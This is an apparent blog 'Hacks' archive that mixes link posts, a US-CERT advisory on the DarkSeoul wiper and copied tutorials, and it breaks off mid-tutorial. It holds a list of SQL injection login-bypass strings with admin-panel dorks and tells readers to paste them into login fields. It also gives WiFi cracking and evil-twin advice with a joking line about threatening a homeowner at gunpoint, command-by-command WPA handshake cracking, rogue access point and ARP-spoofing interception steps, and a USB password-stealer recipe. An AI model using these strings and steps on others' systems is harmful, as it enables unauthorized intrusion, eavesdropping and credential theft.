THE MANUAL
Category Archives: Hacks
Hacking Unity Games
Within the Unity engine, developers can add “scripts” (written in C#) which make up some of the game logic – these will often be our target. Unlike more traditionally compiled games, these “scripts” are not simply compiled into the .exe where we can find a static memory offset to patch… but we do have some other options.
https://www.hypn.za.net/blog/2020/04/11/hacking-unity-games/
How to Hack WiFi (Wireless) Network
Wireless networks are accessible to anyone within the router’s transmission radius. This makes them vulnerable to attacks. Hotspots are available in public places such as airports, restaurants, parks, etc.
In this tutorial, we will introduce you to common techniques used to exploit weaknesses in wireless network security implementations. We will also look at some of the countermeasures you can put in place to protect against such attacks.
Just follow the rabbit…link below
https://www.guru99.com/how-to-hack-wireless-networks.html
Proxy server…HELL no!
Airport lounge
Hacker Builds a QR Code Generator That Lets Him Into Fancy Airport Lounges http://gizmodo.com/hacker-builds-a-qr-code-generator-that-lets-him-into-fa-1784884083/amp
Scary bun known knowledge
The Dark Arts: Hacking Humans http://hackaday.com/2016/06/10/the-dark-arts-hacking-humans/amp/
Basically everything can be hacked…not only computing devices
Hackers can read your WhatsApp and Telegram chats if they wanted to
Ps4 hack
Watch homebrew code run Steam games on the PS4 http://www.engadget.com/2016/05/22/steam-on-ps4-demo/
Apple Mac persistent rootkit malware june 2015
Symantec says a critical vulnerability within some Apple Mac models could allow hackers to inject systems with persistent rootkit malware.
The security firm confirmed the existence of the security flaw late on Thursday. The flaw, called the Apple Mac OS X EFI Firmware Security Vulnerability, was originally disclosed last week by security researcher Pedro Vilaca.
The problem lies within Mac sleep mode. After Macs awake from this low-power hibernation, a flawed suspend-resume implementation means that some Mac models’ flash protections are left unlocked.
In short, cyberattackers could, in theory, reflash the computer’s firmware in this time window and install Extensible Firmware Interface (EFI) rootkit malware.
This kind of virulent malware can be used to remotely control a system and potentially steal user data — and may not be eradicated even if a system wipe is set in motion.
While this attack is unlikely to impact on users en masse, it could be exploited in order to spy upon specific, targeted users with valuable data or accounts to share.
Symantec has confirmed the existence of the vulnerability and has rated the flaw as “critical” as it can provide “an attacker with persistent root access to a computer that may survive any disk wipe or operating system reinstallation,” according to the firm.
“The vulnerability could be remotely exploited by an attacker if used in conjunction with another exploit that provided root access,” Symantec says.
“While such vulnerabilities are not widespread, they do emerge from time to time. Once an attacker has root access, the only condition required for successful exploit is that the computer enter sleep mode.”
Vilaca claims the bug can be used with Safari or another remote vector to install an EFI rootkit without physical access, and the only requirement is that the computer is suspended within the session.
To date, Symantec has tested four different Mac computer models. The security firm found that the Mac Mini 5.1 and MacBook Pro 9.2 are vulnerable, whereas the MackBook Pro 11.3 and MacBook Air 6.2 are not affected. Vilaca’s tests verified the MacBook Pro Retina 10.1, MacBook Pro 8.2, MacBook Air 5.1 and Mac Pro 9.1 are vulnerable. All computers tested ran on Apple’s latest firmware versions. Vilaca commented:
“I’m pretty sure Apple is aware of the bug or at least it would be quite irresponsible from them to not test if their BIOS implementation was vulnerable to the Dark Jedi attack. I had no issues doing PoC tests with it but definitely needs other people to test it out (at least to find which other Macs are vulnerable).”
Until such a time when Apple issues a firmware patch to fix the security flaw, concerned users are advised to shut down their computers rather than put them in sleep mode.
SQL INJECTION STRINGS LIST
SQL injection is a technique often used to attack data driven applications.
This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker).
SQL injection is a code injection technique that exploits a security vulnerability in an application’s software.
The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed.
SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
‘ or 0=0 —
” or 0=0 —
or 0=0 —
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
‘ or ‘a’=’a
” or “a”=”a
‘ or 0=0 #
” or 0=0 #
or 0=0 #
admin’–
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 —
hi’ or 1=1 —
hi’ or ‘a’=’a
hi’) or (‘a’=’a
hi”) or (“a”=”a
(For Education Purpose Only).
List of Dorks to find Admin Panel of a Website.
Copy and paste one of the dork from the list below to Google search engine. When Admin panel opens paste these sql injection string into the Username and password fields and click login.
Change it , if you own a website!
login.htm
login.html
login/
adm/
admin/
admin/account.html
admin/login.html
admin/login.htm
admin/controlpanel.html
admin/controlpanel.htm
admin/adminLogin.html
admin/adminLogin.htm
admin.htm
admin.html
adminitem/
adminitems/
administrator/
administration/
adminLogin/
admin_area/
manager/
letmein/
superuser/
access/
sysadm/
superman/
supervisor/
control/
member/
members/
user/
cp/
uvpanel/
manage/
management/
signin/
log-in/
log_in/
sign_in/
sign-in/
users/
accounts/
wp-login.php
bb-admin/admin.html
relogin.htm
relogin.html
registration/
moderator/
controlpanel/
fileadmin/
admin1.html
admin1.htm
admin2.html
yonetim.html
yonetici.html
phpmyadmin/
myadmin/
ur-admin/
Server/
wp-admin/
administr8/
webadmin/
administratie/
admins/
administrivia/
Database_Administration/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
power_user/
system_administration/
ss_vms_admin_sm/
bb-admin/
panel-administracion/
instadmin/
memberadmin/
administratorlogin/
pages/admin/
admincp/
adminarea/
admincontrol/
modules/admin/
siteadmin/
adminsite/
kpanel/
vorod/
vorud/
adminpanel/
PSUser/
secure/
webmaster/
security/
usr/
root/
secret/
moderator.php
moderator.html
0admin/
0manager/
aadmin/
login_admin/
login_out/
loginerror/
loginok/
loginsave/
loginsuper/
logout/
secrets/
super1/
supervise/
admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
phpSQLiteAdmin/
server_admin_small/
database_administration/
system_administration/
hack into emails
Exaustive article to give an intro of how to hack into emails
http://www.hackingarticles.in/category/how-to-hack-email/
Crack WI-FI methods
Depends on the encryption of the wifi. If it’s WEP, then its generally fairly easy to crack using Aircrack-ng. However, WPA/WPA2 two will need to be forced with the following methods, these are just a few to keep in mind:
-The evil twin method: Launch a DOS (via De-auth requests) against one of the registered computers on the targeted wifi network, forcing the user to be disconnected. From there, set up your own little honeypot with the same ESSID & BSSID as the other wifi network and try to effectively trick the person to try logging in to your connection. At that point you’ll see the password that was entered through the other computer’s attempted access. From there you could alse allow the user on and let the honey-potting begin! 🙂
-Bruteforce via Aircrack-ng by capturing a WPA/WPA2 handshake from the targeted wifi by de-authing a user on the network, and then waiting for the re-connection reply sent. From there take the capture file, and crack the password via wordlist or Charlist. (Takes the most time, however more likely to have success if you have enough patience to wait that long for results.)
-WPS-PSK pin cracking – basically trying random combinations of pin numbers until the right one is found. A good program for this is REAVER, if you don’t want to do it manually.
These are common methods; however, there are many more.
-To perform these attacks I recommend the Aircrack-ng package and Wireshark programs.
Another Way :
Use Dsploit, aircrack-ng 411 (kali linux), create a network map, then use bluejack to get cold-storage passwords for WEP, or WPA enterprise.
If it’s as simple as WPA, WPA-2, you can use airmon-ng.
If you’re really, really good, you can do the same as me, & load all these items into a phone.
It requires a rooting, which may take a few hours, but considering phones have AWFUL antennas for wifi listening, don’t expect to get much information without using a bluejacking.
FINAL WAY…Just kidding, but somewhat true:
Foolproof methods:
~Hold a loaded gun to the homeowners head and ask for the wifi password.
Less foolproof but almost there:
~Wait until he is gone, go into his house, get on his PC.
Follow the instructions from superuser to show the characaters of the WIFI password assuming his computer is connected to it:
“In the computer that can connect to the network, type Manage wireless networks into the start menu search. Right click on the properties for the network you want and click Properties. In the security tab you should see an option to Show characters.
This will reveal your WiFi password that computer remembers.”
source: https://superuser.com/questions/424624/is-the-wifi-password-stored-somewhere-in-windows-7
I haven’t tested this myself, but it seems like it would work.
Difficult:
~Use a program like Aircrack-ng, or attempt to hack the router.
CONCLUSION: These methods take serious effort or risk, and the reality is that it just makes more sense to pay a few dollars a month for a portable wifi hotspot (about the same cost per month as a burner phone), get the service from an ISP that price gouges your area, or to go to the nearest cheap hotel and sit in the parking lot. If it was so easy, everyone would do it.
South Korean Malware Attack
Executive Summary
Reporting and technical details surrounding the malware used in the March 20, 2013, attack on
South Korean assets have been varied and inconsistent. However, there are some commonalitie reported across multiple organizations that provide some level of insight into the malware, dubbed DarkSeoul.
The common attributes of the attack campaign are the following:
•The malicious file wipes the master boot record (MBR) and other files.
•The malware was hard coded with a specific execution date and time and searches
machines for credentials with administrative/root access to servers.
•The malware is written to specifically target South Korean victims.
•The attack is effective on multiple operating systems.
•The design is low sophistication – high damage.
When assessing the potential risk to U.S. Critical Infrastructure and Key Resources (CIKR), it isimportant to understand that DarkSeoul appears to have been coded for a specific target in this case and designed to evade typical South Korean antivirus processes. As this malware is currently packaged, it is a low risk to U.S. CIKR, however, the concepts underpinning this attack would likely succeed in many common enterprise environments. For this reason, U.S. CIKR owners and operators should continue the best standard security practices to avoid infection and propagation of a wiper or other type of malware that may impact their systems.
Defensive Measures Based on the common attributes detailed above, US‐CERT reminds users and administrators of the importance of best practices to strengthen the security posture of their organization’s systems.
CIKR owners and operators should work toward a resilient network model that assumes such an attack will occur against their enterprise.
The goal is to minimize damage, and provide pathways for restoration of critical business functions in the shortest amount of time possible.
•Encourage users to transfer critical files to network shares, to allow for centralized
backups. Leverage technical solutions to automate centralized storage where possible to
reduce reliance on end-user voluntary compliance.
•Execute daily backups of all critical systems, including offline and offsite copies of
backup media.
•Periodically execute a practice data restoration from backups, including key databases to
ensure integrity of existing backups and processes.
•Establish emergency communications plans should network resources become
unavailable.
•Isolate any critical networks (including operations networks) from business systems, and
where possible segment the business networks.
•Identify critical systems and evaluate the need to have on-hand spares to quickly restore
service.
•Recognize that without proper internal monitoring, an organization’s “Enterprise Trust
Anchors” (Active Directory, PKI, two-factor authentication,
etc.) and centralized management services (remote helpdesk access, patch management and asset inventory suites,etc.) could be compromised and used to subvert all other security controls.
•Maintain up‐to‐date antivirus signatures and engines.
•Restrict users’ ability (permissions) to install and run unwanted software applications
through Microsoft Software Restriction Policy (application directory whitelisting) or
AppLocker, application whitelisting products, or host-based intrusion prevention software.
•Enforce a strong password policy and implement regular password changes.
•Keep operating system patches up to date.
•Disable unnecessary services on workstations and servers.
•Scan for and remove suspicious email attachments; ensure the scanned attachment is its
‘true file type’ (i.e., the extension matches the file header).
•Exercise caution when using removable media (e.g., USB thumb drives, external drives,CDs).
•Scan all software downloaded from the Internet prior to executing by properly authorized
personnel.
•Disable credential caching for all desktop devices with particular importance on critical
systems such as servers and restrict the number of cached credentials for all portable
devices to no more than three, if possible. This can be accomplished through a Group Policy Object (GPO).
Getting the Local Traffic Report
It can be problematic and lead to headaches – and possibly even hair loss (your follicles may vary) – if you need to capture local network traffic (sent to your own device or PC) as many tools (even the venerable WireShark) aren’t very helpful with that scenario. However, there is a way to do it using two free tools, namely RawCap and the aforementioned WireShark. Once you know how, it’s (almost) as easy as pie — that is, eating a pie, such as an apple pie – not memorizing 3.14….etc)
First, download RawCap here
Next (provided you don’t already have it, of course), download Wireshark here
Once you have RawCap and Wireshark installed, open a command prompt and navigate to the folder where you downloaded RawCap.
Then, enter a command such as “rawcap.exe 127.0.0.1 platypus.pcap”
which is:
RawCap.exe [IP Address you want to monitor] [name of file].pcap
You can run RawCap one of two ways:
Run cmd as Administrator Proactively
Select Start > All Programs > Accessories > Command Prompt > r-click > Run as Administrator
Run cmd as “Normal” User and Respond to Prompt
Select Start > “cmd” > [ enter command line for rawcap to use ] > accept “User Account Dialog” dialog
If you use the latter option, the feedback (how many packets have been received) will display in a separate command prompt window:
IOW, the difference between the two ways of running it is: Do you want to get and dismiss the “User Account Control” dialog before you enter the command line verbiage or after you enter it?
Go
Now, perform the procedure that generates the network traffic you want to capture. Once it is finished, you can go back to the command prompt and mash Ctrl+C. Alternatively, you can specify the count of packets you want it to capture, or the number of seconds for which you want it to capture. Enter “rawcap ?” and mash the Enter key for the syntax for doing either of these. Or, you can take my word for it that it is:
“-c [packet count]” to “stop sniffing after receiving a specified count of packets
-and
“-s [number of seconds]” to “stop sniffing after a specified number of seconds
IOW:
rawcap.exe -c 42 meaningOfLifeEtc.pcap
…to capture 42 packets
-and:
rawcap.exe -s 8 rodeo.pcap
…to capture packets until the cowboy either gets bucked off or outlasts the beast.
After mashing the Enter key to start rawcap capturing, then performing the operation to send/receive packets, and finally mashing Ctrl+C at the command prompt to stop capturing, you will see something like this (where the folder to which you downloaded rawcap replaces “MiscInWindows7”) there at the command line:
After the capture is complete using any of the methodologies delineated above (manually stopping capturing, or setting it to capture a number of packets or for a specified number of seconds), open Wireshark and select File > Open…, navigate to the .pcap file, and open it.
You will then cast your beaming and/or gleaming peepers upon a magnificent cornucopia of information about the network traffic captured. You can now search through this overgrown forest for individual trees you want to find by select Edit > Find Packet… and then entering what is of interest to you; in my case, I’m expecting some traffic to/from port 7727 on my PC, so I enter that:
…and it takes me to the first line with such; Selecting Find > Next (Ctrl+N) takes me to the next one (etc.)
And so you have it: a couple of free tools and a modicum of work, and you’ve got more network traffic information than your local television stations’ traffic reporter ever dreamed of having.
Turn your IPod Iphone or soon to be Ipad into a hacker system
For all the complaints against apple for making it hard to get an application registered and sold in the Apple store, there are some very cool applications that can be used to set up your Iphone or other apple Iphone OS based system into an excellent scanning and pseudo hacker tool. These are the products you want to get if you are a security engineer.
Security Scanner by Tommy Kammerer
A full featured port scanner for your Iphone, IPod or soon to be Ipad that will help you figure out what systems have what ports open on a remote computer. Cost is 1.99 and it works quite well, but at times a bit slow depending on the network you are working with. This is the coolest tool out there right now to use an IPod/Ipad/Iphone for security work.
iNet Pro Network Scanner
This one is more detailed in terms of providing the name, IP address and number of services running on each computer that it encounters. Works excellent on an Iphone/IPod meaning it will work great on an Ipad as well.
iTap RDP Client for Windows by HLW
This application completely rocks and is very easy to use. It works on all the Iphone/Ipod systems that I tested this on and allowed remote access. Saving off the data from the security scanner you can use this tool for checking Windows based systems that might be improperly secured.
iTap VNC Client
Same as the iTap RDP Client – just works on VNC systems and is the most expensive application of the lot. Works very well and if the VNC server is not set up right can help you figure out how to connect to systems that are improperly configured or are not using a good password system.
WiFi Analyzer
A very simple WiFi analyzer to let you know what networks are around you and which ones are secure and which ones are not. Very similar to any other wireless network analyzer on the market, this one works on your IPod/Iphone and should work great on an Ipad.
With these tools you can turn your Iphone/IPod and soon to be Ipad into a relatively robust and portable security/hacker system that will let you know a lot about the networks you are connecting too.
10 Android hacking tools
Lets see 10 Android tools that are meant for hacking and hackers.
1.Hackode :- Hackode : The hacker’s Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc.
2.Androrat:- Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.
3.APKInspector:- APKinspector is a powerful GUI tool for analysts to analyse the Android applications. The goal of this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code.
4.DroidBox:- DroidBox is developed to offer dynamic analysis of Android applications.
5.Burp Suite:- Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.
6.zANTI:- zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.
7.Droid Sheep:- DroidSheep can be easily used by anybody who has an Android device and only the provider of the web service can protect the users. So Anybody can test the security of his account by himself and can decide whether to keep on using the web service.
8.dSploit:- dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assessments on a mobile device.
9.AppUse – Android Pentest Platform Unified Standalone Environment:- AppSec Labs recently developed the AppUse Virtual Machine. This system is a unique, free, platform for mobile application security testing in the android environment, and it includes unique custom-made tools created by AppSec Labs.
10.Shark for Root:- Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump.
Perfect OS for hacking.
Anonymous released their own operating system, based on Ubuntu and Mate.
Should we download it…no, not really as they usually add troyan and malware in it…so you hack and then you get hacked…not funny.
Kali linux, backtrack OS, yes, but as above paranoia it’s in me so… best solution.
Honestly, they all are just like any other linux distros for the most part. If you are not yet, I suggest starting by getting comfortable with Ubuntu(WITHOUT the Unity interface). Ubuntu is a very user friendly distro, so don’t be afraid if you haven’t used it before.
Once you are comfortable with Ubuntu, you will notice that Backtrack pretty much IS Ubuntu, with security/penetration tools installed by default. I would suggest googling the tools, and reading up on their proper use, and if you have any questions, you can go here: [www.backtrack-linux.org]
On a personal note, MANY of the tools I still can’t remember the exact steps to use. I have several text documents on the desktop of my Backtrack install, that list the steps to go through/terminal commands needed for the various tools.
In addition check the my article about the hacking tools.
Personally this will create your, personal, secure hacking suite.
Your choice really!
How to Hack Your Own Network and Beef Up Its Security with Kali Linux
Kali Linux is a security-focused operating system you can run off a CD or USB drive, anywhere. With its security toolkit you can crack Wi-Fi passwords, create fake networks, and test other vulnerabilities. Here’s how to use it to give your own a network a security checkup.
Kali Linux is packed with a ton of software for testing security holes in your network. There are far too many to list here, but we’re so enamored with it that we decided to pick a few of our favorite tools and show how they work: Aircrack, Airbase, and ARPspoof. We’ll show you how to crack a Wi-Fi password with brute force techniques, create a fake router to trick machines into logging into it, and perform a man in the middle attack to eavesdrop on network communications. Remember: use these powers for good, not for evil. Knowing how to do these things can get you out of a jam or help you learn to secure your own network, but doing them to someone else is not something we recommend.
Crack a WPA Wi-Fi Password with Aircrack
Kali Linux comes with a whole suite of apps for cracking Wi-Fi networks, including Aircrack and Reaver—both of which we’ve mentioned before for cracking WEP and WPA passwords, respectively.
However, WEP passwords aren’t that popular anymore (because they’re so easy to crack), and Reaver only works if a network has WPS enabled. So today, we’re going take another look at Aircrack and use it to to brute force our way into a WPA network (with the help of a password list).
Step One: Configure Your Wireless Card
First things first: disconnect from all wireless networks. Then open up terminal. In order to use Aircrack, you’ll need a wireless card that supports injections. Type this into the Terminal to make sure your card supports it:
airmon-ng
This lists all the wireless cards that support this crack. If you card doesn’t support injections, it won’t show up here. Yours is likely listed under interface as wlan0, but it may depend on your machine.
Next, type in:
airmon-ng start wlan0
Replace wlan0 with your card’s interface address. You should get a message back saying that monitor mode was enabled.
Step Two: Monitor Your Network
Next, you’re going to get a list of all the networks in your area and monitor yours.
Type in:
airodump-ng mon0
You’ll see all the networks in your area. Locate your network from the list, and copy the BSSID, while making a note of the channel it’s on. Tap Ctrl+C to stop the process.
Next, type this in, replacing the information in parentheses with the information you gathered above:
airodump-ng -c (channel) --bssid (bssid) -w /root/Desktop/ (monitor interface)
It should read something like this:
airodump-ng -c 6 --bssid 04:1E:64:98:96:AB -w /root/Desktop/ mon0
Now, you’ll be monitoring your network. You should see four files pop up on the desktop. Don’t worry about those now; you’ll need one of them later. The next step is a bit of a waiting game, as you’ll be sitting around waiting for a device to connect to a network. In this case, just open up a device you own and connect to your Wi-Fi. You should see it pop up as a new station. Make a note of the station number, because you’ll need that in the next step.
Step Three: Capture a Handshake
Now, you’re going to force a reconnect so you can capture the handshake between the computer and the router. Leave Airodump running and open up a new tab in Terminal. Then type in:
aireplay-ng -0 2 -a (router bssid) -c (client station number) mon0
It should look something like:
aireplay-ng -0 2 -a 04:1E:64:98:96:AB -c 54:4E:85:46:78:EA mon0
You’ll now see Aireplay send packets to your computer to force a reconnect. Hop back over to the Airodump tab and you’ll see a new number listed after WPA Handshake. If that’s there, you’ve successfully grabbed the handshake and you can start cracking the password.
Step Four: Crack the Password
You now have the router’s password in encrypted form, but you still need to actually figure out what it is. To do this, you’ll use a password list to try and brute force your way into the network. You can find these lists online, but Kali Linux includes a few small lists to get you started in the /usr/share/wordlists directory, so we’ll just use one of those. To start cracking the password type this in:
aircrack-ng -a2 -b (router bssid) -w (path to wordlist) /Root/Desktop/*.cap
So, continuing with our above example and using one of the built-in wordlists, it should read something like:
aircrack-ng -a2 -b 04:1E:64:98:96:AB -w /usr/share/wordlists/fern-wifi/common.txt /Root/Desktop/*.cap
Now, Aircrack will try all of those passwords to see if one fits. If it does, you’ll get a message saying the key was found with the password. If not, give another one of the password lists a try until you find one that works. The bigger the password list, the longer this process will take, but the greater chance you have of succeeding.
How to Use This Information to Stay Safe
So, you just brute forced your way into your own network. Depending on how good your password is, it either took you five minutes or five hours. If your password is something simple, like “password123”, then chances are one of the smaller wordlists was able to crack it pretty quickly. If it was more complicated, it probably took a long time or never surfaced the password at all (if so: good for you!).
The best protection here is a good, strong password on your router. The longer, weirder, and more complex it is, the better. Likewise, make sure you’re using the WPA2 security protocol and you don’t have WPS enabled.
Create a Fake Network with Airbase
Next up, let’s take a look at how you can spoof a network address to trick people into signing into the wrong network so you can watch what they’re doing. Hackers might do this so you sign into the fake network thinking it’s your real one, then performing a man in the middle attack (more on that in the next section) to gather information about you from your traffic. This is amazingly easy to do with a tool in Kali Linux called Airbase.
Essentially, you’ll turn your Wi-Fi adapter on Kali Linux into an access point with the same name as another network. In order to do this, you’ll follow the same line of research as you did above, but the ending’s a bit different.
Step One: Configure Your Wireless Card
Just like last time, you need to set up your wireless card to monitor traffic. Open up Terminal and type:
airmon-ng
This lists all the wireless cards that support this crack. Yours is likely listed under interface as wlan0.
Next, type in:
airmon-ng start wlan0
Now you’re in monitor mode. It’s time to find the network you want to spoof.
Step Two: Find a Wi-Fi Network to Spoof
In order to spoof a router, you’ll need some information about it. So, type in:
airodump-ng mon0
You’ll see all the networks in your area. Locate your network from the list and copy the BSSID, while making a note of its name and the channel it’s on. This is the router you’re going to spoof. Tap Ctrl+C to stop the process.
Step Three: Create a Fake Network
Now, you’re going to create the fake network with Airbase. Type this in, replacing the information you gathered in the last step for the parenthesis:
airbase-ng -a (router BSSID) --essid "(network name)" -c (channel) mon0
For example, it should read something like:
airbase-ng -a 04:1E:64:98:96:AB --essid "MyNetwork" -c 11 mon0
That’s it. You’ve now spoofed the router and created a clone with the same name, channel, and SSID number so it’s indistinguishable from the original. Unfortunately, the computers on that network will always connect to the most powerful router with that name automatically, so you need to turn up the power of your fake network. Type in:
iwconfig wlan0 txpower 27
This bumps up the power of your fake network to the maximum accepted limit so hopefully next time they log in, they connect to you automatically. It shouldn’t do any damage to the card as long as you don’t go higher than 27. Once they do, it’ll be just like you’re both on the same network. That means you can access whatever they’re doing pretty easily.
How to Use This Information to Stay Safe
Spoofing a network is tough to find, but you can usually spot it when network traffic is slow, or if it suddenly doesn’t require a password authentication. If you’re really paranoid someone is spoofing a router, you can turn off the ability to automatically connect to Wi-Fi, so you at least have time to look at the router you’re logging into.
Snoop Another Device’s Traffic with a Man in the Middle Attack with ARP Spoofing
A Man in the Middle Attack is essentially eavesdropping on your network. Here, you’ll intercept network signals between a computer and a router without the computer realizing it. We’ve shown you how to do packet sniffing and today we’ll use ARP spoofing to gather this information. Both sniffing spoofing are about listening in on conversations, but they work a little differently. Sniffing captures traffic by monitoring a network, spoofing pretends to be that network. These types of attacks are often used to grab passwords, images, and pretty much anything else you’re sending over your network.
Step One: Turn On Packet Forwarding
First things first, you need to make your Kali Linux machine forward any traffic it gets so the target computer can still access the internet. Type this into the command line:
echo 1 > /proc/sys/net/ipv4/ip_forward
This will ensure all information is forwarded after it’s intercepted. That way, the internet and any other communications between the router and the target computer will continue to work.
Step Two: Turn On ARP Spoofing
Now you need to turn on ARP spoofing. This tricks the computer and the router into thinking that your Wi-Fi adapter is a bridge. When you successfully spoof, you can monitor all traffic between the devices. You’ll do this twice so you can capture traffic going to your computer from the router and from your computer to the router.
To capture traffic from your router type this in, replacing the parenthesis with your network’s information:
arpspoof -i wlan0 -t (router address) (target computer address)
You’ll see a bunch of number outputting showing that it’s running. Leave that running, then open another tab in Terminal and do the reverse:
arpspoof -i wlan -t (target computer address) (router address)
Both lines should look something like this:
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.105
arpspoof -i wlan0 -t 192.168.1.105 192.168.1.1
Now, all the traffic between those two machines is being collected in Kali Linux. There are a ton of tools to actually capture this information, but let’s just take a look at a couple of them here.
To track any URLs the computer visits, open up another Terminal tab and type in:
urlsnarf -i wlan0
This will display any web sites the computer visits.
If you’re more interested in images, you can capture any image traffic as well. Type in:
driftnet -i wlan0
A window will pop up and display any images they load and transfer over the network. Basically, if there’s any unencrypted information being sent between the router and the computer, you’ll see it happen.
How to Use This Information to Stay Safe
The best way to keep people from ARP spoofing your network is to secure your network with a strong password and make sure they’re not in there in the first place. That said, turning on a firewall on your machine helps as well. Also, make sure you’re always using HTTPS when it’s available. When HTTPS is on, an ARP spoofer won’t capture anything you’re doing. This is especially important when you’re on public Wi-Fi and can’t control a network’s security.
Create a USB Password Stealer to See How Secure Your Info Really Is
Step One: Collect Your Tools
NirSoft makes a ton of utilities that we love, and they have a pretty good suite of security tools. We’re going to use a few that recover passwords to create our ultimate USB tool.
Plug in your USB drive, and create a folder titled “Utilities”. Then, download the following zip files (not the self-install executables) from the NirSoft Password Recovery Utilities page onto the thumb drive and—after extracting the files—place all of the .exe files in the Utilities folder:
MessenPass Mail PassViewProtected Storage PassView Dialupass BulletsPassViewNetwork Password RecoverySniffPass Password SnifferRouterPassViewPstPasswordWebBrowserPassViewWirelessKeyViewRemote Desktop PassViewVNCPassView
Each of these executable files recovers passwords from a specific place on the computer. For example, WirelessKeyView.exe pulls your wireless key, and WebBrowserPassView.exe grabs all of the passwords stored in your browsers. If you want to see what each one does in detail, check the NirSoft page linked above. If you see any other password recovery tools you want to try out, download them as well, but what we have here is a good starting point.
Step Two: Automate the Tools to Work With One Click (XP and Vista Only)
Next, we’re going to set up a script that runs all these utilities at once—allowing you to grab a giant cache of stored passwords in one click (though it only works properly on Windows XP and Vista, so if you’re only using this on Windows 7 and above, you can skip this step). Open your text editor, and for each file you downloaded, write this line of code in one text file:
start filename /stext filename.txt
Replace “filename” with the name of the executable you just downloaded, including the file extension. When you replace “filename” after the backslash, you will change the .exe to a .txt file extension. This is the password log the executable will create for you to see. A finished script should look like this:
